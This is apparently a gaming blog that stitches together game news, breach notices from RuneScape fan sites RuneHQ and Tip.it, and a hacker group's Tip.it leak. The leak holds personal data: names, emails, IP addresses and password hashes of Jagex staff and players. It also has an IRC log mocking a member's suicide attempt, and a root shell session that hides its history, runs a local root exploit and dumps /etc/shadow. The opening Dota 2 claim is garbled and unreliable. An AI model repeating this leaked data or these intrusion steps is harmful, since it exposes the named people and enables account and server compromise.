According to Matt McConnery, the head of Dota 2, their game will be played for 10 years by players from both South Korea and also China. That means, every year, there will be at least the same number of people playing DOTA 2 in those two countries. That's because the population will increase.
Sphere: Related ContentSunday, February 19, 2012
Diablo 3 Beta Keys and Download
The Diablo 3 Beta Keys have been given to major fansites and hundreds of them are still available from D3Sanc.com . Once they are finished, there will be more and also the release date of Diablo 3 will be confirmed by Blizzard to be before July 2012.
Any questions about Diablo 3? Well discuss them on the Diablo 3 Forums on D3Sanc.
Diablo 3 Expansion
The Diablo III expansion has not been announced yet because as of me writing this post, even Diablo 3's release date is not confirmed. What we do know is that there will be ponies in the game that will give some cool prizes in the Secret Pony Level :
Strings
- Battle For Ponies
- The battle for ponies is about to begin.
- The Pinnacle of Ponies Event
- Ponies_HopePrison - Hope's Prison
- PoniesPurificationTimer - Purification Timer
- Bridle_Ponies - Bridle
- Quest_Act4_PoniessFall_MonkReward - Magic Fist Weapon
- Quest_Act4_PoniessFall_DHReward - Magic Hand Crossbow
- Quest_Act4_PoniessFall_BarbReward - Magic Weapon
- Quest_Act4_PoniessFall_WDReward - Ceremonial Dagger
- Quest_Act4_PoniessFall_WizReward - Magic Wand
- TentacleHorse - Rainbow Western
- Unique_TentacleHorse_A - Midnight Sparkle
- TentacleHorse_B_Unique - Nightmarity
- Unique_TentacleHorse_A - Nightmare is Magic
- Unique_TentacleHorse_B - Generosity in Death
Sphere: Related Content
Wednesday, October 12, 2011
RuneHQ hacked
So what exactly happened?
Well, we were the latest victims of a nasty group of people going around finding vulnerabilities in RuneScape fan sites. There was an old, outdated piece of code lingering on our site longer than it should have been and these guys took advantage of it. They managed to grab the entire members database including emails, RHQ login and display names, hashed passwords, and more.
At some point we figured out the hole in our security and a hotfix was implemented preventing this type of action further, but it was too late as they already had what they came for. When it was discovered exactly what had happened, we took the forums offline completely and began to investigate our options.
In the end we decided to completely start fresh with the forums. We decided this for a couple reasons.
- Our database had been filling up with junk for a number of years. It was time to clean it up and clear some things out anyways.
- You would all be required to at the very least enter a new password. We probably would have required a new login name as well.
- There was initially a minor glitch in the backup process with our forums.
- The hackers were also sometimes using info posted on your HQ accounts to help try and recover your accounts. Removing everything prevents them from having any current info or quite as easily being able to match up who is who.
- A number of people would ask for their accounts to be removed anyways due to a lack of trust from us now.
It was just better for everyone's safety to wipe it all. We are aware of who is responsible, so please do not post any links regarding this issue as it will only lead to an instant ban of your account.
On behalf of everyone here at RuneHQ, I'm deeply sorry that this happened and I apologize for everything that has taken place. I hope you continue to use us as your number one source for all RuneScape information as we will continuing striving to be the best help site out there.
When you re-register, please keep in mind that you should NEVER use your RuneScape password on any other website. Your password should also be complex. Here is a very short list of passwords you should never use:
- password
- dragon
- runescape
- qwerty
- abc123
- [your username]
- [anything that is one, simple, real word]
Tip.it got hacked
Hello Folks,
As you know Tip.It and Forum.Tip.It have been down most of October 11 and continues to be down. Tip.It's servers were unfortunately hacked and the only way to ensure user security and regain control of our servers was to shut down the servers until we can be completely confident that they are safe again.
As a result, it is likely that segments of our user database were dumped and are now in the hands of other people to use against your RuneScape account or other online accounts. The stolen data may or may not include usernames, password hashes, email addresses, IP addresses and any other information you may have provided on the Tip.It Forums. Please note that your forum password was absolutely NOT stored in plain text - all passwords on our forums are encrypted and will require brute forcing from the hackers in order to render them usable. Regardless, we are assuming the worst and recommending you take action now to ensure your accounts are all secure.
It is highly recommended to ensure that your password and email address used on Tip.It are NOT used ANYWHERE else on the internet, especially on your RuneScape account. If you use the same password and/or email address on your RuneScape account, it is HIGHLY likely that your account will be compromised sooner or later. Don't take the risk - use a UNIQUE password and email address on your RuneScape account to insure maximum security.
We also highly recommend you beef up the security on your email address. Often times hackers can gain access to your email and wreak havoc by accessing any accounts tied into that particular email. A few tips to ensure email account safety:
-Don't be sloppy on your recoveries - make them as difficult to crack as your password. Random numbers, letters and symbols with mixed cases works beautifully!
-Delete old emails you have no need to keep - the less information stored in your email the better!
-Use two-step verification with your mobile device wherever possible - this is powerful tool to keep unauthorized people out of your email!
As of now, approximately 0230 GMT on October 12, 2011, and for several hours prior to this, all Tip.It's servers are entirely under the control of the Tip.It administration. Every effort is being made by the administration to restore normal service as soon as possible.
Lastly, all rumours surrounding Tip.It Administrators' involvement in child pornography are entirely FALSE and are exactly that - RUMOURS. No staff members at Tip.It are involved in the creation or distribution of child pornography nor is there pornography of any kind on Tip.It servers. These are simply rumours created to cause controversy in the community - and it has worked. Again, these allegations are ENTIRELY FALSE.
This is all the information available at this point. We will do our best to continue to update the community as much as possible through these difficult times. We appreciate your support during this rough time and we apologize for the inconvenience that this downtime causes to your game play.
Respectfully yours,
Tip.It Administrative Team
,. ,·´'; ' ,.-·. ,.-·~·-., ' ,.-·~·-., ' ,., ' ,. – - ., ° ,. - ., ,. -,
;'´*´ ,'\ ,' ';'\° / ;'\' ,.·´ ,. - ., '`. ,.·´ ,. - ., '`. ;´ '· ., ';_,.., _ '`. ' ,' ,. - ., `' ·, ,.·'´, ,'\
; ';::\ ; ;::'\ ; ;:::\ ,'´ ,·´\::::::::`; ';\ ' ,'´ ,·´\::::::::`; ';\ ' .´ .-, ';\ \:::::::::::'; ,'\ '; '·~;:::::'`, ';\ ,·'´ .·´'´-·'´::::\'
; '\;' ; ;:::; '; ;::::;' ,' ;'::::\;::-::;:'; ;:\ ,' ;'::::\;::-::;:'; ;:\ / /:\:'; ;:'\' '\_;::;:,·´ .·´::\‘ ; ,':\::;:´ .·´::\' ; ';:::\::\::;:'
,' ,'`\ \ ; ;:::; ; ;::::; '; ';::;·´ ,' ,'::'; '; ';::;·´ ,' ,'::'; ,' ,'::::'\'; ;::'; , '´ .·´:::::;' ; ·'-·'´,.-·'´:::::::'; \·. `·;:'-·'´
; ;::;'\ '\ ; ;:::; '; ;'::::; .';'\ '\;' .' .':::::;' .';'\ '\;' .' .':::::;' ,.-·' '·~^*'´¨, ';::; .´ .'::::::;·´' ;´ ':,´:::::::::::·´' \:`·. '`·, '
; ;:::; '\ '\ ,' ;:::;' ; ';:::'; '; \:'. '·, ,·´ .·'::::::;' '; \:'. '·, ,·´ .·'::::::;' ':, ,·:²*´¨¯'`; ;::'; .·´ ,·´:::::;·´ '; , `·:;:-·'´ `·:'`·, \'
,' ,'::;' '\ ¨ ,'\::;' '; ;::::;' \ `·:`· '´ ;´::::::::;' ' \ `·:`· '´ ;´::::::::;' ' ,' / \::::::::'; ;::'; ,·´ .´;::–·~^*'´';\‚ ; ,':\'`:·., ` ·., ,.'-:;' ,·\
;.'\::; \`*´\::\; ° \*´\:::;‘ \` ·- · :\`·. `·:;:·´ ' \` ·- · :\`·. `·:;:·´ ' ,' ,'::::\·²*'´¨¯':,'\:; '.,_ ,. -·~:*'´¨¯:\:\ ° \·-;::\:::::'`:·-.,'; ,·'´ ,.·´:::'\
\:::\' '\:::\:' ' '\::\:;' '\::::::::\:;` · .,.'· ' '\::::::::\:;` · .,.'· ' \`¨\:::/ \::\' \:::::::::::::::::::\; \::\:;'` ·:;:::::\::\' \`*'´\::::::::;·'‘
\:' `*´'‚ `*´‘ ` ·- · '´`·:::::\::\ ` ·- · '´`·:::::\::\ '\::\;' '\;' ' \:;_;::-·~^*'´¨¯' '·-·' `' · -':::'' \::::\:;:·´
` · :\_\‚ ` · :\_\‚ `¨' '`*'´‘
~ Raflz - Led-Zeppelin - Sigex3unit ~
heya friends!
So.. the niqaz here trollin' along the tip.it sidewalk when we hear some rumours about a tip.it box seeding childporn.. Immediately this grabs our attention due to the fact we're all huge humanitarians and really care about kids. We start an investigation into this. During our investigation we find out silverion and associates ALSO abuse all types of kids and users into buying their site merchandise and.. They make over 2K USD a day doing so, selling shirts, cups, and what not, including ads. So, we decide that we have to hack tip.it as we start to find growing evidence of such horrible activity and sure enough, after about one week of doing our magic we get in. THERE IN THE /home/ FOLDER.. NEED I EVEN SAY WHAT WE FOUND? WHAT DO YOU THINK? SILVERION IS FUCKING SICK. The only thing to do now is to force-close tip.it. To all the children who may have been approached sexually by silverion or other admins. Please contact the police or go see a shrink as we have some logs of this happening, but will not be posting. Truly a horrible thing to find. Now how about them jagex mods getting hacked? uh oh I think we might be responsible!! | 193396 | mithandriel | tim.gaming@gmail.com | 212.44.19.206 | ca3e57f0732fe8df2e686f8f099b7676 | jGnuv | darth_vader | mithandriel | | 209342 | baker011 | gregg.baker@jagex.com | 212.44.19.206 | 022176e3ab7f735f5298b7eb96ddcd81 | $":l' | baker011 | baker011 | | 65 | Paul | paul@jagex.com | | | | paul | paul | | 4906 | rincewind01 | simon.brace@jagex.com | | | | rincewind01 | rincewind01 | | 5720 | Tolakin | tytn@jagex.com | | | | tolakin | tolakin | | 10899 | blutack | mark.ogilvie@jagex.com | | | | blutack | blutack | | 91774 | Ross_Mills | ross.mills@jagex.com | | | | ross_mills | ross_mills | | 112488 | 74387454at | lameo@jagex.com | | | | 74387454at | 74387454at | | 187651 | Hohbein | chris.hohbein@jagex.com | 212.44.19.206 | b7222735fce3760e0191e03499897b69 | rTu]z | hohbein | hohbein | | 209920 | Eduardo | fansites@jagex.com | 69.11.111.56 | fa9ce04dffbc8932ec441b71c559dafa | kam}c | eduardo | eduardo | | 182633 | Pilbeam | 6894@tmp | 212.44.19.206 | | | pilbeam | pilbeam | | 181507 | Choobein | hohbeinfansites@googlemail.com | 212.44.19.206 | | | choobein | choobein | | 165641 | obidiah | friedkipper@yahoo.co.uk | 212.44.19.206 | 3baea46bf195edde0379f62e808b35da | | obidiah | obidiah | | 209343 | Zachory | zacantonaci@hotmail.com | 212.44.19.206 | 799c2d48ac83dfa95695f63192c7d880 | [p-Z2 | _zach_ | zachory | | 181727 | 74387454at | f5e86ffe2cbe84e75097f44e402c6429 | lameo@jagex.com | fronttooth | 87648 | | 160956 | Ross_Mills | 1b26983ac0ebbeca11089af9032762e3 | ross.mills@jagex.com | NULL | | | 19726 | blutack | 8869aff85a1be23274b622b2f6d1fe33 | mark.ogilvie@jagex.com | NULL | | | 8934 | Tolakin | 2634bf743a7199dc2aab20987b42bf02 | tytn@jagex.com | NULL | | | 7364 | rincewind01 | d2aa6a7090d9a3d20df7376a109b349d | simon.brace@jagex.com | NULL | | | 68 | Paul | afaa6fc39a06abac971ad4f747bb830e | Paul@jagex.com | | |and just for the lulz...
| 12018 | Zezima | 4dce43b48137ec3cd5782f8dc8728c10 | peter_zezima@hotmail.com | | | 7399 | Zezima | peter_zezima@hotmail.com | 137.99.170.196 | 4a6bafbda23f350cc394fb91d178f10d | ?L5b. | zezima | zezima |
irc.SwiftIRC.net
iiii
###### ###### i::::i
#::::# #::::# iiii
#::::# #::::#
######::::######::::######rrrrr rrrrrrrrr ssssssssss nnnn nnnnnnnn iiiiiii qqqqqqqqq qqqqq aaaaaaaaaaaaa zzzzzzzzzzzzzzzzz
#::::::::::::::::::::::::#r::::rrr:::::::::r ss::::::::::s n:::nn::::::::nn i:::::i q:::::::::qqq::::q a::::::::::::a z:::::::::::::::z
######::::######::::######r:::::::::::::::::r ss:::::::::::::s n::::::::::::::nn i::::i q:::::::::::::::::q aaaaaaaaa:::::a z::::::::::::::z
#::::# #::::# rr::::::rrrrr::::::rs::::::ssss:::::snn:::::::::::::::n i::::i q::::::qqqqq::::::qq a::::a zzzzzzzz::::::z
#::::# #::::# r:::::r r:::::r s:::::s ssssss n:::::nnnn:::::n i::::i q:::::q q:::::q aaaaaaa:::::a z::::::z
######::::######::::###### r:::::r rrrrrrr s::::::s n::::n n::::n i::::i q:::::q q:::::q aa::::::::::::a z::::::z
#::::::::::::::::::::::::# r:::::r s::::::s n::::n n::::n i::::i q:::::q q:::::q a::::aaaa::::::a z::::::z
######::::######::::###### r:::::r ssssss s:::::s n::::n n::::n i::::i q::::::q q:::::qa::::a a:::::a z::::::z
#::::# #::::# r:::::r s:::::ssss::::::s n::::n n::::ni::::::iq:::::::qqqqq:::::qa::::a a:::::a z::::::zzzzzzzz
#::::# #::::# r:::::r s::::::::::::::s n::::n n::::ni::::::i q::::::::::::::::qa:::::aaaa::::::a z::::::::::::::z
###### ###### r:::::r s:::::::::::ss n::::n n::::ni::::::i qq::::::::::::::q a::::::::::aa:::az:::::::::::::::z
rrrrrrr sssssssssss nnnnnn nnnnnniiiiiiii qqqqqqqq::::::q aaaaaaaaaa aaaazzzzzzzzzzzzzzzzz
q:::::q
q:::::q
q:::::::q
q:::::::q
q:::::::q
qqqqqqqqq
* Naffy (~JamesMurr@Swift-D212DF66.lnk.telstra.net) has joined #rsniqazHey narbs <@Raflz> helo <@Raflz> welcome bak 4m da ded <@Raflz> wud u like tip it db <@Raflz> to feast Hey man Do you guys all think im trolling? <@Raflz> LOL <@Raflz> should've hit the car faster bro LOL I really dont need this I'll talk to you guys later Ive been in the psych ward since sunday night <@Raflz> ROFL <@Raflz> do u want <@Raflz> tip.it I just got out <@Raflz> to feast <@Raflz> or not yeah. I would if thats a possibility <@Raflz> i love you man <@Raflz> im not gonna lie i really feel like doing it gave my life direction <@Raflz> lets b butt buddiez I actually learnt something Yeah <@Raflz> like <@Raflz> how to hit a car faster hitting parked cars at 120KM/h hurts eh <@Raflz> lesson: i'll paste the convo I had <@Raflz> if ur gonna suicide right before I hit it with my mate <@Raflz> hit a car faster next time <@Raflz> LOL while i was snorting oxy ok paste it <@Raflz> paste it pls wait up If you can beat me in a game of LoL 1v1 i will give you tip.it me: man if i actually went through with it now would I be a bad person? Would I be selfish? him: Not worth it man Seriously Fucking You're actually intelligent me: but.. itd be over for me This convo suddenly turned really gay k No continue but yeah theres more o me: but there will be others man others like me others with such power. i see everything man, i know im insane but ive seen it for a long time i feel like i can see peoples thoughts I was referring to raflz use of the term 'bluenaffle' in pm him: There's no such thing as insane It's just difficult dealing with what you know Happened to my uncle me: ive got the keys man Im going to think about it on the drive but.. i always enjoyed talking to you. <@Raflz> LOL i'll see you in another life brother im getting the last little pieces before i walk to the car one last cigarette. i told you 5 so i'll stick to that <@Raflz> man <@Raflz> why didnt you hit it faster Can you see people naked? <@Raflz> you just suck they wont come to terms with it but they will understand it. i'm hoping my dad left the keys. and if he didnt, they'll be on the kitchen table. whats your number? I'll give you a ring i lost control never really driven before <@Raflz> just <@Raflz> 120km/h rofl ok raflz dont be mean dude, that's pretty fucking fast. naffy is our friend <@Raflz> no it isnt <@Raflz> fuck off didnt feel like it
Oh dem niqqaz, how do dey do it
[root@ldx ~]# ssh tip.it -lbulat
bulat@tip.it's password:
[bulat@web01 root]$ export HISTFILE=/dev/null
[bulat@web01 root]$ uname -a
Linux web01.tip.it 2.6.34.9-69.fc13.x86_64 #1 SMP Tue May 3 09:23:03 UTC 2011 x86_64 x86_64 x86_64 GNU/Linux
[bulat@web01 root]$ ./tr1p
Enter b1tch key: ******
[+] Tr1p/SSDTX local root exploit by g4yh1tl3r
[+] Resolved commit_creds to ffffffff8106b909
[+] Resolved prepare_kernel_cred to ffffffff8106b7f1
[+] Us1ng 1dt b1tch br34k
[+] Preparing underflow payload
[+] Mapped ZERO PAGE!
[root@web01 ~]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[root@web01 ~]# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi-autoipd:x:499:499:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
vcsa:x:69:498:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/lib/rpcbind:/sbin/nologin
named:x:25:25:Named:/var/named:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
nscd:x:28:497:NSCD Daemon:/:/sbin/nologin
rpcuser:x:29:496:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
apache:x:48:495:Apache:/var/www:/sbin/nologin
haldaemon:x:68:494:HAL daemon:/:/sbin/nologin
openvpn:x:498:493:OpenVPN:/etc/openvpn:/sbin/nologin
distcache:x:94:492:Distcache:/:/sbin/nologin
saslauth:x:497:491:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
mailnull:x:47:490::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:489::/var/spool/mqueue:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
avahi:x:496:488:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin
mysql:x:27:487:MySQL Server:/var/lib/mysql:/bin/bash
nm-openconnect:x:495:486:NetworkManager user for OpenConnect:/:/sbin/nologin
webalizer:x:67:485:Webalizer:/var/www/usage:/sbin/nologin
sshd:x:74:484:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
dovecot:x:494:483:Dovecot IMAP server:/usr/libexec/dovecot:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
backuppc:x:493:481::/var/lib/BackupPC:/sbin/nologin
torrent:x:492:480:BitTorrent Seed/Tracker:/var/lib/bittorrent:/sbin/nologin
bulat:x:500:500::/home/bulat:/bin/bash
wizard:x:501:501::/home/wizard:/bin/bash
eira:x:502:502::/home/eira:/bin/bash
beta:x:503:503::/home/beta:/bin/bash
peter:x:504:504::/home/peter:/bin/bash
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
clamupdate:x:491:477:Clamav database update user:/var/lib/clamav:/sbin/nologin
qemu:x:107:107:qemu user:/:/sbin/nologin
ntpd:x:505:505::/home/ntpd:/bin/bash
[root@web01 ~]# cat /etc/shadow
root:$1$qIp096Pv$zl2.573V3Ovhc5B/aYw0G/:15101:0:99999:7:::
bin:*:14715:0:99999:7:::
daemon:*:14715:0:99999:7:::
adm:*:14715:0:99999:7:::
lp:*:14715:0:99999:7:::
sync:*:14715:0:99999:7:::
shutdown:*:14715:0:99999:7:::
halt:*:14715:0:99999:7:::
mail:*:14715:0:99999:7:::
uucp:*:14715:0:99999:7:::
operator:*:14715:0:99999:7:::
games:*:14715:0:99999:7:::
gopher:*:14715:0:99999:7:::
ftp:*:14715:0:99999:7:::
nobody:*:14715:0:99999:7:::
dbus:!!:15101::::::
avahi-autoipd:!!:15101::::::
vcsa:!!:15101::::::
rpc:!!:15101:0:99999:7:::
named:!!:15101::::::
oprofile:!!:15101::::::
nscd:!!:15101::::::
rpcuser:!!:15101::::::
nfsnobody:!!:15101::::::
apache:!!:15101::::::
haldaemon:!!:15101::::::
openvpn:!!:15101::::::
distcache:!!:15101::::::
saslauth:!!:15101::::::
mailnull:!!:15101::::::
smmsp:!!:15101::::::
ntp:!!:15101::::::
avahi:!!:15101::::::
mysql:!!:15101::::::
nm-openconnect:!!:15101::::::
webalizer:!!:15101::::::
sshd:!!:15101::::::
squid:!!:15101::::::
dovecot:!!:15101::::::
tcpdump:!!:15101::::::
backuppc:!!:15101::::::
torrent:!!:15101::::::
bulat:$1$pbU71z/Y$B7ZmB6iJ06oaE.IBQfVPZ1:15102:0:99999:7:::
wizard:$1$CBfOJrU/$OZt5/z.bvCz8jSe5dGv4z0:15101:0:99999:7:::
eira:$1$mgj4N28N$t41xK8Keu/zcZbWQYDcrM/:15102:0:99999:7:::
beta:$1$D9qXxl5h$lLqbnp2aQu.TBT5CP/ZTZ/:15114:0:99999:7:::
peter:$1$Rw2yjv6w$9VRHWzZzZGsZdar5O0vbu/:15113:0:99999:7:::
postfix:!!:15102::::::
clamupdate:!!:15149::::::
qemu:!!:15149::::::
ntpd:$1$oIM2m0O9$utO5JUZ5DSsF2ZtcsMb4t1:15253:0:99999:7:::
[root@web01 ~]# cd ~bulat
[root@web01 bulat]# cat .bash_history
su -
ls
ls -lt
sftp bulat@forum.tip.it
[root@web01 bulat]# ls -la
total 9683064
drwx------ 6 bulat bulat 4096 Oct 11 07:50 .
drwxr-xr-x. 8 root root 4096 Oct 6 10:49 ..
drwxr-xr-x 3 bulat bulat 4096 Oct 7 01:11 b2
-rw-r--r-- 1 bulat bulat 8918314 Sep 6 15:10 backup-forum-etc-06092011.tar.gz
-rw-r--r-- 1 root root 7174178 Sep 26 15:51 backup-forum-etc-26092011.tar.gz
-rw-r--r-- 1 root root 403491046 Sep 26 15:50 backup-forum-mysql-26092011.tar.gz
-rw-r--r-- 1 bulat bulat 493592011 Sep 6 15:58 backup-forum-www-06092011.tar.gz
-rw-r--r-- 1 root root 4322670602 Sep 26 15:44 backup-forum-www-26092011.tar.gz
-rw-r--r-- 1 bulat bulat 399822071 Sep 6 07:58 backup-mysql-full-06092011.tar.gz
drwxr-xr-x 17 bulat bulat 4096 Oct 7 01:10 backups
drwxr-xr-x 14 bulat bulat 4096 Oct 7 01:14 backups-oldwww
-rw-r--r-- 1 bulat bulat 4270006769 Sep 6 08:24 backup-www-full-06092011.tar.gz
-rw-r--r-- 1 bulat bulat 18 May 21 2010 .bash_logout
-rw-r--r-- 1 bulat bulat 176 May 21 2010 .bash_profile
-rw-r--r-- 1 bulat bulat 124 May 21 2010 .bashrc
drwx------ 3 bulat bulat 4096 Oct 9 08:09 .ssh
-rw-r--r-- 1 bulat bulat 658 Mar 22 2010 .zshrc
[root@web01 bulat]# ls -la backup*
-rw-r--r-- 1 bulat bulat 8918314 Sep 6 15:10 backup-forum-etc-06092011.tar.gz
-rw-r--r-- 1 root root 7174178 Sep 26 15:51 backup-forum-etc-26092011.tar.gz
-rw-r--r-- 1 root root 403491046 Sep 26 15:50 backup-forum-mysql-26092011.tar.gz
-rw-r--r-- 1 bulat bulat 493592011 Sep 6 15:58 backup-forum-www-06092011.tar.gz
-rw-r--r-- 1 root root 4322670602 Sep 26 15:44 backup-forum-www-26092011.tar.gz
-rw-r--r-- 1 bulat bulat 399822071 Sep 6 07:58 backup-mysql-full-06092011.tar.gz
-rw-r--r-- 1 bulat bulat 4270006769 Sep 6 08:24 backup-www-full-06092011.tar.gz
backups:
total 18520536
drwxr-xr-x 17 bulat bulat 4096 Oct 7 01:10 .
drwx------ 6 bulat bulat 4096 Oct 11 07:50 ..
-rw-r--r-- 1 root root 68802560 May 19 14:18 backup-etc-2011051901.tar
-rw-r--r-- 1 root root 22169600 May 18 18:01 backup-etc-20110519.tar
-rw-r--r-- 1 root root 9019408 May 19 14:18 backup-forum-etc-20091210.tar.gz
-rw-r--r-- 1 root root 403491046 Oct 6 10:52 backup-forum-mysql-26092011.tar.gz
-rw-r--r-- 1 root root 708034560 May 18 19:02 backup-mysql-20110519.tar
-rw-r--r-- 1 root root 48271360 May 8 02:39 backup-mysql-beta-20110507.tar
-rw-r--r-- 1 root root 699760640 May 8 02:41 backup-mysql-full-20110507.tar
-rw-r--r-- 1 root root 699627520 May 8 02:42 backup-mysql-full-20110508.tar
-rw-r--r-- 1 root root 2723840 May 8 02:42 backup-mysql-lotro-20110507.tar
-rw-r--r-- 1 root root 604866560 May 8 02:44 backup-mysql-runescape-20110507.tar
-rw-r--r-- 1 root root 870400 May 7 10:01 backup-w2-arena-20110507.tar
-rw-r--r-- 1 root root 960880640 May 7 10:03 backup-w2-beta-20110507.tar
-rw-r--r-- 1 root root 16844800 May 7 10:03 backup-w2-easygadget-20110507.tar
-rw-r--r-- 1 root root 3998003200 May 7 10:12 backup-w2-html-20110507.tar
-rw-r--r-- 1 root root 11192320 May 7 10:12 backup-w2-lotro-20110507.tar
-rw-r--r-- 1 root root 10240 May 7 10:12 backup-w2-trieste-20110507.tar
-rw-r--r-- 1 root root 1587200 May 7 10:12 backup-w2-war-20110507.tar
-rw-r--r-- 1 root root 5302497280 May 18 19:13 backup-www-20110519.tar
-rw-r--r-- 1 root root 68802560 May 19 14:18 backup-wwwetc-20110519.tar
drwx------ 2 mysql mysql 12288 May 7 18:00 beta
-rw-r--r-- 1 root root 19850900 May 8 02:44 full-w2-mysql-20070828.tgz
-rw-r--r-- 1 root root 17941509 May 8 02:44 full-w2-mysql-20080608.tgz
-rw-r--r-- 1 root root 5245419520 May 7 10:24 full-w2-www-20110507.tar
drwx------ 2 mysql mysql 4096 Jul 2 2007 lotro
drwx------ 2 mysql mysql 4096 Mar 4 2007 MD_Stats
drwx------ 2 mysql mysql 4096 Nov 24 2006 mysql
-rw-r--r-- 1 root root 19374500 May 8 02:44 mysql-20080827.tar.gz
drwx------ 2 mysql mysql 4096 Dec 18 2003 mysql-old
-rw-r--r-- 1 root root 16208748 May 8 02:44 mysql.tar.gz-OLD
drwx------ 2 mysql mysql 4096 Nov 24 2006 phpmyadmin
drwx------ 2 mysql mysql 4096 May 8 00:51 PhpStats019
drwx------ 2 mysql mysql 4096 Jul 11 2008 rewrite
drwx------ 2 mysql mysql 12288 Oct 7 01:11 runescape
drwx------ 2 mysql mysql 4096 Jan 30 2008 runescape_copy
drwx------ 2 mysql mysql 4096 Sep 15 2007 silks
drwx------ 2 mysql mysql 4096 Jul 30 2007 volantini
drwx------ 2 mysql mysql 4096 Oct 2 2008 war
drwxr-xr-x 15 mysql mysql 4096 May 19 13:38 wwwsql
drwx------ 2 mysql mysql 4096 Apr 14 02:34 zenit
backups-oldwww:
total 9586804
drwxr-xr-x 14 bulat bulat 4096 Oct 7 01:14 .
drwx------ 6 bulat bulat 4096 Oct 11 07:50 ..
-rw-r--r-- 1 root root 9009631 May 21 12:54 backup-etc-2011051901.tar.gz
-rw-r--r-- 1 root root 9019408 May 21 12:54 backup-forum-etc-20091210.tar.gz
-rw-r--r-- 1 root root 435602073 May 21 12:55 backup-forum-html-20091210.tar.gz
-rw-r--r-- 1 root root 1222295 May 21 12:55 backup-forum-teamspeak-20091210.tar.gz
-rw-r--r-- 1 root root 201001674 May 21 12:59 backup-mysql-20110519.tar.gz
-rw-r--r-- 1 root root 13800344 May 21 13:00 backup-mysql-beta-20110507.tar.gz
-rw-r--r-- 1 root root 197321301 May 21 13:05 backup-mysql-full-20110507.tar.gz
-rw-r--r-- 1 root root 197287223 May 21 13:11 backup-mysql-full-20110508.tar.gz
-rw-r--r-- 1 root root 764740 May 21 13:11 backup-mysql-lotro-20110507.tar.gz
-rw-r--r-- 1 root root 172928002 May 21 13:16 backup-mysql-runescape-20110507.tar.gz
-rw-r--r-- 1 root root 298212 May 21 13:16 backup-w2-arena-20110507.tar.gz
-rw-r--r-- 1 root root 575464655 May 21 13:21 backup-w2-beta-20110507.tar.gz
-rw-r--r-- 1 root root 11999273 May 21 13:22 backup-w2-easygadget-20110507.tar.gz
-rw-r--r-- 1 root root 1682773384 May 21 13:45 backup-w2-html-20110507.tar.gz
-rw-r--r-- 1 root root 8756867 May 21 13:45 backup-w2-lotro-20110507.tar.gz
-rw-r--r-- 1 root root 1035 May 21 13:45 backup-w2-trieste-20110507.tar.gz
-rw-r--r-- 1 root root 824683 May 21 13:45 backup-w2-war-20110507.tar.gz
-rw-r--r-- 1 root root 2413773014 May 21 14:17 backup-www-20110519.tar.gz
-rw-r--r-- 1 root root 9009490 May 21 14:17 backup-wwwetc-20110519.tar.gz
drwx------ 2 mysql mysql 4096 Aug 15 2008 beta
-rw-r--r-- 1 root root 8485310 May 21 14:17 full-db-backup-03-25-07.tar.gz
-rw-r--r-- 1 root root 6820368 May 21 14:17 full-db-backup-12-14-06.tar.gz
-rw-r--r-- 1 root root 30778399 May 21 14:18 full-db-backup-2010-04-25.1.tar.gz
-rw-r--r-- 1 root root 30778779 May 21 14:18 full-db-backup-2010-04-25.tar.gz
-rw-r--r-- 1 root root 19850900 May 21 14:18 full-w2-mysql-20070828.tgz
-rw-r--r-- 1 root root 17941509 May 21 14:19 full-w2-mysql-20080608.tgz
-rw-r--r-- 1 root root 586278595 May 21 14:21 full-w2-www-20070828.tgz
-rw-r--r-- 1 root root 2389188411 May 21 14:47 full-w2-www-20110507.tar.gz
drwx------ 2 mysql mysql 4096 Jul 2 2007 lotro
drwx------ 16 mysql mysql 4096 Nov 24 2006 mysql
-rw-r--r-- 1 root root 19374500 May 21 14:47 mysql-20080827.tar.gz
-rw-r--r-- 1 root root 16208748 May 21 14:47 mysql.tar.gz-OLD
drwx------ 2 mysql mysql 4096 Nov 24 2006 phpmyadmin
drwx------ 2 mysql mysql 4096 Aug 27 2008 PhpStats019
drwx------ 2 mysql mysql 4096 Jul 11 2008 rewrite
drwx------ 2 mysql mysql 4096 Aug 16 2008 runescape
drwx------ 2 mysql mysql 4096 Jan 30 2008 runescape_copy
drwxr-xr-x 3 root root 4096 Oct 6 11:09 var
drwx------ 2 mysql mysql 4096 Jul 30 2007 volantini
drwx------ 2 mysql mysql 4096 Sep 16 2007 war
-rw-r--r-- 1 root root 740444414 May 21 14:51 www.tar.gz-OLD
drwx------ 2 mysql mysql 4096 Jun 18 2008 zenit
[root@web01 bulat]# cd /var/www/html
[root@web01 html]# ls -la
total 711004
drwxr-xr-x 20 root root 4096 Oct 11 07:45 .
drwxr-xr-x 21 root root 4096 Jun 28 09:06 ..
drwxrwxr-x 13 root apache 4096 Sep 24 16:25 adds
-rw-rw-r-- 1 eira eira 499 Dec 20 2003 back.JPG
